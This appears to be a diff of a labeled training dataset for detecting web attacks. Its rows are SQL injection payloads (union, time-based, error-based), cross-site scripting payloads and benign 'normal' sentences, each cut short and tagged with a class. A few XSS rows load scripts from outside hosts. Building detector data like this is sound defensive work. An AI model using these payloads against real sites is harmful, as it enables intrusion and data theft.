) union all select 6216,6216,6216,6216,6216",2,SQLi,14315 +"UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8",2,SQLi,10765 +1' where 1031 = 1031 or char ( 68 ) ||char ( 69 ) ,2,SQLi,13948 +1 and char ( 109 ) ||char ( 79 ) ||char ( 70 ) ||c,2,SQLi,14345 +<basefont onpointerover=alert(1)>XSS</basefont>,1,XSS,5602 +<script>function x(window) { eval(location.hash.su,1,XSS,9293 +1 and 3754 = ( select upper ( xmltype ( chr ( 60 ),2,SQLi,15992 +1)) or sleep(5)#,2,SQLi,10358 +"<h1 onmouseleave=""alert(1)"">test</h1>",1,XSS,3640 +"1%' ) ) ) and make_set ( 8403 = 8403,8899 ) and ( ",2,SQLi,20600 +Retrieve rows where required.,0,normal,23258 +"select * from generate_series ( 5980,5980,case whe",2,SQLi,18299 +"Why, he might ask, should he not select the simple",0,normal,25120 /><img/onerror=\x60javascript:alert(1)\x60src=xxx:,1,XSS,600 -"-8200' where 3422 = 3422 or 1570 = convert ( int, ",2,SQLi,20277 -<;SCRIPT SRC=http://ha.ckers.org/xss.js,1,XSS,1653 -Select your surpass.,0,normal,25012 -<thead id=x tabindex=1 ondeactivate=alert(1)></the,1,XSS,8107 -"<fieldset onmouseover=""alert(1)"">test</fieldset>",1,XSS,1894 -"<hr draggable=""true"" ondrag=""alert(1)"">test</hr>",1,XSS,7834 -"{""id"":null,""firstName"":""Angie"",""lastName"":""Ang"",""s",0,normal,26765 -select,0,normal,26619 -"1%"" union all select null,null,null,null#",2,SQLi,20747 +1' ) and 5556 = ( select count ( * ) from all_user,2,SQLi,20279 +<;SCRIPT SRC=//ha.ckers.org/.j>;,1,XSS,1654 +"1"" ) ) as gprr where 5975 = 5975 and 2388 = benchm",2,SQLi,22416 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,8109 +<tfoot onpointerup=alert(1)>XSS</tfoot>,1,XSS,1895 +"<style>@keyframes x{}</style><footer style=""animat",1,XSS,7836 +"{""id"":null,""firstName"":""Eevee"",""lastName"":""Yeo"",""a",0,normal,26762 +procedure,0,normal,23159 +"1 ) union all select null,null,null,null,null,null",2,SQLi,20749 "<<SCRIPT>alert(""XSS"");//\<</SCRIPT>",1,XSS,263 "<html onMouseUp html onMouseUp=""javascript:javascr",1,XSS,376 -call regexp_substring ( repeat ( left ( crypt_key ,2,SQLi,18351 -"1%' procedure analyse ( extractvalue ( 9627,concat",2,SQLi,20342 -&lt;A HREF=&quot;//google&quot;&gt;XSS&lt;/A&gt;,1,XSS,1467 -"select sleep ( 5 ) and ""cyrb"" = ""cyrb",2,SQLi,12616 -"1"" and 6537 = dbms_pipe.receive_message ( chr ( 76",2,SQLi,13544 -"-8136' ) union all select 1324,1324,1324,1324#",2,SQLi,16227 -"<strike onmouseleave=""alert(1)"">test</strike>",1,XSS,5697 --2361' ) ) as mzhv where 2905 = 2905 or 9026 = 538,2,SQLi,17628 -Samsung EVO Select microSDXC (128 GB) — £19.99 (li,0,normal,25733 -Select your field.,0,normal,24858 -Update signature.,0,normal,23067 +"-5196"" ) ) ) or 5023 = ctxsys.drithsx.sn ( 5023, (",2,SQLi,18353 +-3895' ) or 8645 = 5359--,2,SQLi,20344 +&lt;A HREF=&quot;http://ha.ckers.org@google&quot;&,1,XSS,1468 +1 ) as oknr where 3228 = 3228,2,SQLi,12618 +"-7423 or make_set ( 9354 = 9354,7185 ) -- hprc",2,SQLi,13546 +-5336' ) where 8691 = 8691 or 3608 = 1887--,2,SQLi,16229 +"<tfoot onbeforecut=""alert(1)"" contenteditable>test",1,XSS,5699 +1 ) as lvfu where 5831 = 5831 and 7756 = dbms_util,2,SQLi,17630 +#ERROR!,2,SQLi,22532 +Select your job.,0,normal,24855 +select,0,normal,26607 <BODY BACKGROUND=”javascript:alert(‘XSS’)”>,1,XSS,942 -Update profile.,0,normal,23009 -<button onSeek=javascript:alert(1)>,1,XSS,9664 -"1"" ) ) as xwrq where 4161 = 4161",2,SQLi,19731 -1 ) as keog where 8033 = 8033 and extractvalue ( 7,2,SQLi,19042 -1' ) and 6969 = ( select 6969 from pg_sleep ( 5 ) ,2,SQLi,15883 -1%' ) or sleep ( 5 ) and ( '%' = ',2,SQLi,13354 -",NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20d",2,SQLi,10906 -1 and 3754 = ( select upper ( xmltype ( chr ( 60 ),2,SQLi,18187 -"It is also important to select leafy growths, and ",0,normal,25970 -Select educate.,0,normal,24714 -<blockquote id=x tabindex=1 onactivate=alert(1)></,1,XSS,6579 -"-3505"" ) where 2340 = 2340 or 9323 = 9323#",2,SQLi,19184 -1'|| ( select 'nvrq' from dual where 4337 = 4337 o,2,SQLi,20691 -I'm considering where to go for relaxation.,0,normal,23772 -Where's the ranch?,0,normal,23567 -Select the right answer.,0,normal,24307 +"{""id"":null,""name"":""store""}",0,normal,26846 +<button onSelectStart=javascript:alert(1)>,1,XSS,9666 +"1%"" ) ) ) and 2388 = benchmark ( 5000000,md5 ( 0x6",2,SQLi,19733 +"select like ( 'abcdefg',upper ( hex ( randomblob (",2,SQLi,19044 +1' where 6168 = 6168,2,SQLi,15885 +"1%' ) ) ) and elt ( 3114 = 3114,sleep ( 5 ) ) #",2,SQLi,13356 +""",NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20",2,SQLi,10908 +1 ) ) as oqyo where 7995 = 7995,2,SQLi,18189 +It is for you to select a person who you wish to o,0,normal,25967 +Select learn.,0,normal,24711 +<strike id=x tabindex=1 onfocusin=alert(1)></strik,1,XSS,6581 +"1%"" ) ) ) and 6537 = dbms_pipe.receive_message ( c",2,SQLi,19186 +1' ) as jrwx where 6087 = 6087 and updatexml ( 339,2,SQLi,20693 +Where's the perfect spot to enjoy the sunset?,0,normal,23769 +Select your team.,0,normal,24807 +Randomly select a color.,0,normal,24304 "<HTML><BODY><?xml:namespace prefix=""t"" ns=""urn:sch",1,XSS,299 -It Was Proposed By A Committee Of The British Asso,0,normal,25949 -"1"" ) ) as yuqr where 7226 = 7226 and ( select * fr",2,SQLi,20208 -1 ) ) as hgtl where 3864 = 3864 and elt ( 3114 = 3,2,SQLi,17242 -<tt id=x tabindex=1 onactivate=alert(1)></tt>,1,XSS,7978 -"1234 "" AND 1 = 0 UNION ALL SELECT ""admin"", ""81dc9b",2,SQLi,11464 -<dfn onblur=alert(1) tabindex=1 id=x></dfn><input ,1,XSS,2036 -select ( case when ( 2576 = 7563 ) then 2576 else ,2,SQLi,20424 -"ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,",2,SQLi,10451 -&apos;%20OR,2,SQLi,10165 -1 or 5356 = ( select count ( * ) from sysusers as ,2,SQLi,18543 -ORDER BY 19#,2,SQLi,10292 -1' ) ) ) or exp ( ~ ( select * from ( select conca,2,SQLi,17884 -"1 ) and ( select 9067 from ( select count ( * ) ,c",2,SQLi,13398 -"1"" ) where 1024 = 1024 and 2716 = ( select count (",2,SQLi,19897 +It'll also only be live at select locations for ea,0,normal,25946 +-2658 ) as casi where 7364 = 7364 or 8245 = 9651--,2,SQLi,20210 +"1"" ) ) and 3824 = benchmark ( 5000000,md5 ( 0x7655",2,SQLi,17244 +<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,7980 +"select * from users where id = 1 or 1#""; = 1 union",2,SQLi,11466 +<section id=x tabindex=1 onfocus=alert(1)></sectio,1,XSS,2037 +select case when 8514 = 3207 then 1 else null end-,2,SQLi,20426 +"ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,",2,SQLi,10453 +declare @q nvarchar (200) select @q = 0x770061 ...,2,SQLi,10167 +"1 ) and elt ( 3114 = 3114,sleep ( 5 ) ) #",2,SQLi,18545 +ORDER BY 21#,2,SQLi,10294 +1 ) where 9167 = 9167,2,SQLi,17886 +"1',row ( 7937,5067 ) > ( select count ( * ) ,conca",2,SQLi,13400 +"1"" or 4411 = ( select count ( * ) from sysusers as",2,SQLi,19899 "{""id"":null,""name"":""hurt""}",0,normal,27510 -"1 ) or 8384 = like ( 'abcdefg',upper ( hex ( rando",2,SQLi,14221 -"<details onmouseover=""alert(1)"">test</details>",1,XSS,8845 -"<s onmousemove=""alert(1)"">test</s>",1,XSS,6829 -"<data onmousedown=""alert(1)"">test</data>",1,XSS,7131 -Where can I select a class for my fitness routine?,0,normal,23758 -"<pre draggable=""true"" ondragenter=""alert(1)"">test<",1,XSS,7955 --3582 ) where 5873 = 5873 or 4747 = dbms_utility.s,2,SQLi,20470 --2866' ) ) or 4491 = 9429#,2,SQLi,16627 -Select your trend.,0,normal,24889 -"1"" ) as mibc where 3113 = 3113",2,SQLi,13991 -"<article oncontextmenu=""alert(1)"">test</article>",1,XSS,3145 -1'|| ( select 'qstz' where 6835 = 6835,2,SQLi,18029 -1' ) ) ( select ( case when ( 4587 = 4587 ) then r,2,SQLi,14548 -"<style>@keyframes slidein {}</style><blink style=""",1,XSS,7372 -Select a seat.,0,normal,24808 -<form onpointerover=alert(1)>XSS</form>,1,XSS,5595 -1%' and 6537 = dbms_pipe.receive_message ( chr ( 7,2,SQLi,22216 -"-1868"" ) where 9495 = 9495 or 1 group by concat ( ",2,SQLi,14467 -Select a travel destination for an escape.,0,normal,23990 -Filter the junk mail from your mailbox.,0,normal,22921 -"<SCRIPT>document.write(""<SCRI"");</SCRIPT>PT SRC=""h",1,XSS,2077 -<datalist onpointerleave=alert(1)>XSS</datalist>,1,XSS,4104 -<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,7494 -"<video onmousedown=""alert(1)"">test</video>",1,XSS,5969 -"-4596"" union all select 5761#",2,SQLi,15471 -"1"" ) ) or char ( 117 ) ||char ( 111 ) ||char ( 105",2,SQLi,20351 -"{""id"":null,""name"":""Binturong""}",0,normal,27039 -"{""id"":null,""name"":""trouble""}",0,normal,27329 -1%' ) ) ) and 6414 = ( select count ( * ) from rdb,2,SQLi,17966 -"<iframe onmouseout=""alert(1)"">test</iframe>",1,XSS,6755 -"<embed onbeforepaste=""alert(1)"" contenteditable>te",1,XSS,2576 -call regexp_substring ( repeat ( left ( crypt_key ,2,SQLi,14390 -"select count ( * ) from all_users t1,all_users t2,",2,SQLi,16285 -<center onpointermove=alert(1)>XSS</center>,1,XSS,4043 --1485' ) or ( 2056 = 4008 ) *4008 and ( 'vphj' = ',2,SQLi,17752 -1' ) as jdmh where 6175 = 6175 rlike sleep ( 5 ) #,2,SQLi,12854 -"<ruby onclick=""alert(1)"">test</ruby>",1,XSS,4079 -1' and 8407 = ( select count ( * ) from generate_s,2,SQLi,14247 -"<iframe onmouseup=""alert(1)"">test</iframe>",1,XSS,7755 -1 ) ) as rpwt where 4103 = 4103 and 3580 = ( selec,2,SQLi,14167 -</title><</script/script><script>eval('\\u'+'0061',1,XSS,9463 -1' ) ( select ( case when ( 5451 = 5451 ) then reg,2,SQLi,15961 --1711 ) where 9098 = 9098 order by 1#,2,SQLi,19163 -"<optgroup onclick=""alert(1)"">test</optgroup>",1,XSS,4604 -"1"" ) where 9086 = 9086 or sleep ( 5 ) #",2,SQLi,21317 -"-5998%"" ) union all select 2366,2366,2366,2366#",2,SQLi,14253 -[1].find(alert),1,XSS,1986 --3566%' or 2158 = 6289,2,SQLi,20246 -<style>:target {transform: rotate(180deg);}</style,1,XSS,7775 -<</script/script><script ~~~>\u0061lert(1)</script,1,XSS,9727 --1908' ) ) ) union all select 7665#,2,SQLi,16710 -( select ( case when ( 6838 = 2866 ) then 6838 els,2,SQLi,16157 -"1%"" ) and 8407 = ( select count ( * ) from generat",2,SQLi,15561 -"UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,",2,SQLi,10531 -"1"" ) ) as klie where 2840 = 2840 or 8514 = benchma",2,SQLi,12173 -I'm thinking of where to have my next meal.,0,normal,23986 -"<menu draggable=""true"" ondragenter=""alert(1)"">test",1,XSS,4055 -select ( case when ( 4660 = 4660 ) then 4660 else ,2,SQLi,18622 -The Energy Select Sector SPDR Fund ETF (XLE) fell ,0,normal,25454 -"<optgroup onkeyup=""alert(1)"" contenteditable>test<",1,XSS,5230 -1' and 1541 = 6868#,2,SQLi,12371 -1 ) and 4386 = utl_inaddr.get_host_address ( chr (,2,SQLi,20956 -1' ) ) ) and 2853 = cast ( ( chr ( 113 ) ||chr ( 1,2,SQLi,13667 -"<keygen onmousedown=""alert(1)"">test</keygen>",1,XSS,7455 -><img src=x onerror=javascript:alert(('A'))>,1,XSS,1269 +-1886' where 5518 = 5518 or 4493 = utl_inaddr.get_,2,SQLi,14223 +<style>:target {color: red;}</style><hgroup id=x s,1,XSS,8847 +"<span draggable=""true"" ondragstart=""alert(1)"">test",1,XSS,6831 +<caption id=x tabindex=1 onfocus=alert(1)></captio,1,XSS,7133 +How and why did you select the subjects that you d,0,normal,26084 +"<th onkeypress=""alert(1)"" contenteditable>test</th",1,XSS,7957 +"-1269"" union all select 8412,8412,8412,8412,8412,8",2,SQLi,20472 +end and ( ( 'pfrt' = 'pfrt,2,SQLi,16629 +Select your preference.,0,normal,24886 +"1%"" ) ) and 8407 = ( select count ( * ) from gener",2,SQLi,13993 +"<output onmouseup=""alert(1)"">test</output>",1,XSS,3147 +"-8824%' ) ) or make_set ( 9354 = 9354,7185 ) and (",2,SQLi,18031 +"-8881%' union all select 8420,8420,8420,8420,8420,",2,SQLi,14550 +<shadow onpointerup=alert(1)>XSS</shadow>,1,XSS,7374 +Select coffee.,0,normal,24505 +<map id=x tabindex=1 onbeforedeactivate=alert(1)><,1,XSS,5597 +-3648' where 4629 = 4629 order by 1--,2,SQLi,22214 +"-7806"" ) ) or ( 8459 = 8459 ) *4906 and ( ( ""vlrj""",2,SQLi,14469 +Select a class to enhance your skills.,0,normal,23987 +Join the discussion about the latest book.,0,normal,22918 +"<table onkeyup=""alert(1)"" contenteditable>test</ta",1,XSS,2078 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,4106 +"<multicol onkeyup=""alert(1)"" contenteditable>test<",1,XSS,7496 +<dl onpointermove=alert(1)>XSS</dl>,1,XSS,5971 +"-6419 union all select 7008,7008,7008,7008,7008--",2,SQLi,15473 +1%' ) and 2949 = 4847 and ( '%' = ',2,SQLi,20353 +Modify game.,0,normal,23047 +"{""id"":null,""firstName"":""Cammie"",""lastName"":""Sim"",""",0,normal,27328 +"1"" and exp ( ~ ( select * from ( select concat ( 0",2,SQLi,17968 +<style>@keyframes slidein {}</style><source style=,1,XSS,6757 +<input onpointerdown=alert(1)>XSS</input>,1,XSS,2577 +1' and sleep ( 5 ),2,SQLi,14392 +1 ) ) ) or 7417 = ( select count ( * ) from sysibm,2,SQLi,16287 +"<big onkeypress=""alert(1)"" contenteditable>test</b",1,XSS,4045 +-2384'|| ( select 'vhcp' from dual where 1266 = 12,2,SQLi,17754 +call regexp_substring ( repeat ( left ( crypt_key ,2,SQLi,12856 +"<listing onmouseover=""alert(1)"">test</listing>",1,XSS,4081 +"-2612"" ) as iwfj where 3231 = 3231 or 4493 = utl_i",2,SQLi,14249 +"<bgsound onmouseenter=""alert(1)"">test</bgsound>",1,XSS,7757 +"1"" ) ) as itxo where 7916 = 7916",2,SQLi,14169 +</title><scRipt>alert(1)</scRipt>,1,XSS,9465 +"-2112 union all select 2995,2995,2995,2995,2995--",2,SQLi,15963 +1 or ( select * from ( select ( sleep ( 5 ) ) ) yd,2,SQLi,19165 +"<label oncontextmenu=""alert(1)"">test</label>",1,XSS,4606 +"1"" ) ) as dpln where 4193 = 4193 rlike sleep ( 5 )",2,SQLi,21319 +"1, ( select * from generate_series ( 5609,5609,cas",2,SQLi,14255 +<time onblur=alert(1) tabindex=1 id=x></time><inpu,1,XSS,1987 +"-7041"" ) ) ) union all select 2159,2159,2159,2159,",2,SQLi,20248 +<style>:target {color:red;}</style><base id=x styl,1,XSS,7777 +"<img/id=""alert&lpar;&#x27;XSS&#x27;&#x29;\""/alt=\""",1,XSS,9729 +1%' ) ) and 7533 = 7533 and ( ( '%' = ',2,SQLi,16712 +"-4168' ) union all select 2618,2618#",2,SQLi,16159 +-4305 ) as ldrt where 2567 = 2567 union all select,2,SQLi,15563 +UNION ALL SELECT 1#,2,SQLi,10533 +"end and ( ""qkkn"" like ""qkkn",2,SQLi,12175 +I'm thinking of where to go for a scenic hike.,0,normal,23983 +"<sup onmouseover=""alert(1)"">test</sup>",1,XSS,4057 +"1' ) ) and row ( 6237,7469 ) > ( select count ( * ",2,SQLi,18624 +The facts of the problem would all appear covered ,0,normal,25451 +"HREF=""javascript:alert('')",1,XSS,5232 +1'|| ( select 'wadx' where 4287 = 4287 or sleep ( ,2,SQLi,12373 +1' ) ) ) or 9643 = ( select count ( * ) from domai,2,SQLi,20958 +"1"" ) ) as uzvu where 2458 = 2458 or ( select 9173 ",2,SQLi,13669 +<rt onpointerleave=alert(1)>XSS</rt>,1,XSS,7457 +><img src=x onerror=javascript:alert('A')>,1,XSS,1270 <img/src='http://i.imgur.com/P8mL8.jpg' onmouseove,1,XSS,865 -"{""id"":null,""firstName"":""Desmond"",""lastName"":""Tan"",",0,normal,27026 -"<shadow draggable=""true"" ondragend=""alert(1)"">test",1,XSS,4943 -"<iframe draggable=""true"" ondragstart=""alert(1)"">te",1,XSS,2254 -"-2197' union all select 8065,8065,8065,8065--",2,SQLi,22390 -1' ) ) ) and 2853 = cast ( ( chr ( 113 ) ||chr ( 1,2,SQLi,16756 -The products are available at select Target locati,0,normal,25386 -sleep(5)#,2,SQLi,10349 -<label onpointerleave=alert(1)>XSS</label>,1,XSS,7941 +Select your debate.,0,normal,24909 +"<time draggable=""true"" ondragend=""alert(1)"">test</",1,XSS,4945 +"<menuitem oncopy=""alert(1)"" contenteditable>test</",1,XSS,2255 +1' ) ) and 2006 = 2006,2,SQLi,22388 +"1%"" ) union all select null,null#",2,SQLi,16758 +Where to update prices?,0,normal,23444 +or sleep(5)#,2,SQLi,10351 +<style>@keyframes slidein {}</style><marquee style,1,XSS,7943 "`""'><img src=xxx:x onerror\x00=javascript:alert(1)",1,XSS,610 -"<style onmouseenter=""alert(1)"">test</style>",1,XSS,4652 -They can also get 50% off on Hotel Collection Bedd,0,normal,25316 -"1"" ) ) ) or 8384 = like ( 'abcdefg',upper ( hex ( ",2,SQLi,15887 -<head id=x tabindex=1 onbeforedeactivate=alert(1)>,1,XSS,5920 -Select your title.,0,normal,24854 -1' ) ) and 3814 = 4272--,2,SQLi,14023 -1 ) as idvt where 3490 = 3490 and 9660 = ( select ,2,SQLi,18749 -<listing onfocusout=alert(1) tabindex=1 id=x></lis,1,XSS,7149 -"-9978"" or make_set ( 4893 = 9765,9765 ) and ""mhjt""",2,SQLi,13649 -"UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1",2,SQLi,10636 -Do you like to select your seat ahead of time?,0,normal,26235 -1' ) ) as clhk where 4607 = 4607 or ( select 9173 ,2,SQLi,20174 -Let's explore where the city lights shine.,0,normal,23668 -<svg><dir onload=alert(1)></dir>,1,XSS,5582 -Select your career.,0,normal,24856 -"<bdi onpaste=""alert(1)"" contenteditable>test</bdi>",1,XSS,5061 -select,0,normal,26570 -<button onFocus=javascript:alert(1)>,1,XSS,9616 -"{""id"":null,""firstName"":""Leon"",""lastName"":""Chia"",""a",0,normal,27356 -<details onpointerout=alert(1)>XSS</details>,1,XSS,8045 -"-7485%' ) ) ) union all select 1303,1303,1303,1303",2,SQLi,17047 -"<noscript draggable=""true"" ondrag=""alert(1)"">test<",1,XSS,8387 -"1' in boolean mode ) union all select null,null,nu",2,SQLi,14630 -Delete the data.,0,normal,22816 -<svg onload=setInterval(function(){with(document)b,1,XSS,9312 -<tbody onblur=alert(1) tabindex=1 id=x></tbody><in,1,XSS,2777 -"1"" ) as ucex where 5148 = 5148 order by 1#",2,SQLi,20920 -"1%"" ) ) or 7417 = ( select count ( * ) from sysibm",2,SQLi,13668 -Insert fresh batteries.,0,normal,22765 -"-3082"" ) where 1082 = 1082 or 5023 = ctxsys.driths",2,SQLi,22171 +"<input draggable=""true"" ondragenter=""alert(1)"">tes",1,XSS,4654 +"They controlled commerce, and were more energetic,",0,normal,25313 +"1"" and ( 7597 = 8422 ) *8422 and ""gywp"" like ""gywp",2,SQLi,15889 +"<pre onmouseout=""alert(1)"">test</pre>",1,XSS,5922 +Select the optimal settings for the camera.,0,normal,24020 +1' ) ) and 3715 in ( ( char ( 113 ) +char ( 113 ) ,2,SQLi,14025 +"1' where 1093 = 1093 union all select null,null,nu",2,SQLi,18751 +"<abbr onclick=""alert(1)"">test</abbr>",1,XSS,7151 +1'|| ( select 'iocs' where 9287 = 9287 and 8407 = ,2,SQLi,13651 +"UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1",2,SQLi,10638 +Doorbusters include 40% off select women's shoes a,0,normal,26232 +-3304' ) ) order by 1--,2,SQLi,20176 +Where's the mental health clinic?,0,normal,23665 +<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,5584 +Select your position.,0,normal,24853 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,5063 +select,0,normal,26567 +<button onFocusOut=javascript:alert(1)>,1,XSS,9618 +"{""id"":null,""firstName"":""Wei"",""lastName"":""Chuan"",""s",0,normal,27355 +"<video onkeyup=""alert(1)"" contenteditable>test</vi",1,XSS,8047 +"1"" ) ) as dfwi where 9703 = 9703 or 4915 = ( selec",2,SQLi,17049 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,8389 +select ( case when ( 7271 = 1658 ) then 7271 else ,2,SQLi,14632 +Select a song.,0,normal,22813 +"<svg xmlns=""http://www.w3.org/2000/svg"">",1,XSS,9314 +"<isindex onmousedown=""alert(1)"">test</isindex>",1,XSS,2778 +"-8178 ) union all select 4163,4163,4163,4163,4163,",2,SQLi,20922 +"1%' ) and elt ( 3114 = 3114,sleep ( 5 ) ) #",2,SQLi,13670 +Select from options.,0,normal,22762 +"1%' ) or 8514 = benchmark ( 5000000,md5 ( 0x544d5a",2,SQLi,22169 "{""id"":null,""name"":""Growlithe""}",0,normal,27546 -<style>:target {color:red;}</style><acronym id=x s,1,XSS,7190 -1'+ ( select eluw where 6210 = 6210,2,SQLi,13732 -1'|| ( select 'avxz' from dual where 7815 = 7815,2,SQLi,20516 -"<option onmouseup=""alert(1)"">test</option>",1,XSS,5574 -"<time onbeforepaste=""alert(1)"" contenteditable>tes",1,XSS,6136 -"1"" ) ) as hbfi where 4773 = 4773 and 7756 = dbms_u",2,SQLi,20812 -"UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,",2,SQLi,10554 -"<bdi onmouseout=""alert(1)"">test</bdi>",1,XSS,5248 -1 ) union all select null#,2,SQLi,21154 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,3982 -AND 1=utl_inaddr.get_host_address((SELECT DISTINCT,2,SQLi,11086 -"select count ( * ) from rdb$fields as t1,rdb$types",2,SQLi,19054 --4484' ) ) or 6872 = 6872 and ( ( 'oxuo' = 'oxuo,2,SQLi,20362 -"-1869"" ) ) ) union all select 7122,7122,7122,7122,",2,SQLi,16664 -1' in boolean mode ) and 6414 = ( select count ( *,2,SQLi,13159 -<audio id=x tabindex=1 onbeforeactivate=alert(1)><,1,XSS,2173 -"Select ""Accept"" to add that friend to your Friends",0,normal,25684 -<style>:target {transform: rotate(180deg);}</style,1,XSS,8719 -"<canvas onmouseover=""alert(1)"">test</canvas>",1,XSS,7453 --8641%' order by 1--,2,SQLi,15554 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,5198 -1' ) or ( select * from ( select ( sleep ( 5 ) ) ),2,SQLi,17794 -1'+ ( select 'aphz' where 1933 = 1933 union all se,2,SQLi,13211 -select * from users where id = 1 +\+. union select,2,SQLi,11672 -Y.) Permanent Select Committee on IntelligenceChai,0,normal,25109 -1'+ ( select qugu where 2287 = 2287 order by 1#,2,SQLi,15996 -""" Then tap ""parental controls"" and select ""enable ",0,normal,26470 -1' or 1022 = ( select count ( * ) from all_users t,2,SQLi,21058 -"1"" ) ) as ikuz where 7385 = 7385",2,SQLi,20540 -"Max Read, the former editor of Gawker, will lead S",0,normal,25887 --4137 ) ) as elxu where 5672 = 5672 order by 1--,2,SQLi,21268 -<colgroup id=x tabindex=1 ondeactivate=alert(1)></,1,XSS,3810 -#ERROR!,2,SQLi,22532 -")) or benchmark(10000000,MD5(1))#",2,SQLi,10080 -1'|| ( select 'jpso' from dual where 9357 = 9357 o,2,SQLi,12489 -1' ) where 7279 = 7279 and 8189 = ( select count (,2,SQLi,18266 -1' ) ) ) ( select ( case when ( 4587 = 4587 ) then,2,SQLi,21068 -"<style>@keyframes x{}</style><br style=""animation-",1,XSS,5544 -1' ) ) as cpwx where 5378 = 5378 rlike ( select * ,2,SQLi,15682 -"select * from users where id = 1 or ""{ ) "" or 1 = ",2,SQLi,11865 --7404' where 1536 = 1536 order by 1#,2,SQLi,15520 -AnD SLEEP(5) ANd '1,2,SQLi,10402 -1'|| ( select 'rjis' from dual where 7696 = 7696 a,2,SQLi,20948 -1 where 8908 = 8908 or 7417 = ( select count ( * ),2,SQLi,21776 -1 where 9083 = 9083 procedure analyse ( extractval,2,SQLi,21956 -"1%"" order by 1#",2,SQLi,17654 -1 ) where 6424 = 6424,2,SQLi,18735 -"<style>@keyframes slidein {}</style><style style=""",1,XSS,8746 -&lt;IMG LOWSRC=&quot;javascript:alert(&apos;XSS&ap,1,XSS,1385 -"1"" ) as cfed where 8220 = 8220 union all select nu",2,SQLi,21891 -<<scr\0ipt/src=http://xss.com/xss.js></script,1,XSS,9037 -"-5903%"" ) ) ) or 3038 = 3038",2,SQLi,13096 +<pre id=x tabindex=1 onactivate=alert(1)></pre>,1,XSS,7192 +-5217'|| ( select 'juen' from dual where 7336 = 73,2,SQLi,13734 +1 ) ) ) waitfor delay '0:0:5' and ( ( ( 3481 = 348,2,SQLi,20518 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,5576 +<pre onfocusout=alert(1) tabindex=1 id=x></pre><in,1,XSS,6138 +1'+ ( select 'mzee' where 5984 = 5984,2,SQLi,20814 +"UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,",2,SQLi,10556 +<menuitem id=x tabindex=1 onfocusin=alert(1)></men,1,XSS,5250 +"1"" where 5977 = 5977",2,SQLi,21156 +"<progress draggable=""true"" ondragenter=""alert(1)"">",1,XSS,3984 +AND 1=utl_inaddr.get_host_address((SELECT DISTINCT,2,SQLi,11088 +-9541 where 4291 = 4291 or 2724 in ( ( char ( 113 ,2,SQLi,19056 +1 ) where 9469 = 9469 or char ( 117 ) ||char ( 111,2,SQLi,20364 +"iif ( 1378 = 6569,1,1/0 )",2,SQLi,16666 +1%' or ( select * from ( select ( sleep ( 5 ) ) ) ,2,SQLi,13161 +"<ruby onmouseleave=""alert(1)"">test</ruby>",1,XSS,2174 +"Select ""Clear all history"" if you want to delete e",0,normal,25681 +"<li draggable=""true"" ondragenter=""alert(1)"">test</",1,XSS,8721 +"<keygen onmousedown=""alert(1)"">test</keygen>",1,XSS,7455 +1' ) ) or ( select * from ( select ( sleep ( 5 ) ),2,SQLi,15556 +"<blink onclick=""alert(1)"">test</blink>",1,XSS,5200 +1'+ ( select jidy where 2989 = 2989 procedure anal,2,SQLi,17796 +"-4558' or 1 group by concat ( 0x7171706a71, ( sele",2,SQLi,13213 +union select * from users where login = char ( 114,2,SQLi,11674 +Yoox: 60 percent off select merchandise from July ,0,normal,25106 +"1"" where 1452 = 1452 union all select null,null,nu",2,SQLi,15998 +""" When ""CBS All Access"" appears in the search resu",0,normal,26467 +"1' ) and 3824 = benchmark ( 5000000,md5 ( 0x765556",2,SQLi,21060 +"-7923"" ) ) or make_set ( 9354 = 9354,7185 ) and ( ",2,SQLi,20542 +Media browser - click on picture to select A typic,0,normal,25884 +-3559' ) or 5903 = ( 'qqpjq'|| ( select case 5903 ,2,SQLi,21270 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,3812 +#ERROR!,2,SQLi,22529 +hi') or ('a'='a,2,SQLi,10082 +"-4056"" ) ) ) union all select 4363,4363,4363,4363,",2,SQLi,12491 +( 8362 = 9139 ) *9139,2,SQLi,18268 +1'+ ( select lhho where 7579 = 7579 and char ( 109,2,SQLi,21070 +"<rt onmouseup=""alert(1)"">test</rt>",1,XSS,5546 +1 ) where 7956 = 7956 or sleep ( 5 ) #,2,SQLi,15684 +"select * from users where id = 1 or "", ) "" = 1 or ",2,SQLi,11867 +1 ) as cinw where 3732 = 3732 and 8594 = ( select ,2,SQLi,15522 +ORDER BY SLEEP(5),2,SQLi,10404 +"-1585%"" ) ) union all select 8818,8818,8818,8818,8",2,SQLi,20950 +It really will improve your ability to select the ,0,normal,25956 +and then use that information to select your seat.,0,normal,26364 +1 ) where 9160 = 9160,2,SQLi,17656 +1' or sleep ( 5 ) and 'yudo' = 'yudo,2,SQLi,18737 +"<embed onbeforecut=""alert(1)"" contenteditable>test",1,XSS,8748 +&lt;IMG SRC=&quot;http://www.thesiteyouareon.com/s,1,XSS,1386 +1' ) ) or exp ( ~ ( select * from ( select concat ,2,SQLi,21889 +"<? foo=""><script>alert(91)</script>"">",1,XSS,9039 +1' and ( select 2* ( if ( ( select * from ( select,2,SQLi,13098 "<XML SRC=""xsstest.xml"" ID=I></XML> <SPAN DATASRC=#",1,XSS,298 -<style>@keyframes slidein {}</style><article style,1,XSS,8636 -It was followed by two little volumes of similar c,0,normal,25952 -1' ) as eany where 3169 = 3169 and 6414 = ( select,2,SQLi,22209 -"<del onmouseleave=""alert(1)"">test</del>",1,XSS,3868 -1 ) where 1120 = 1120,2,SQLi,22177 -"<table onkeyup=""alert(1)"" 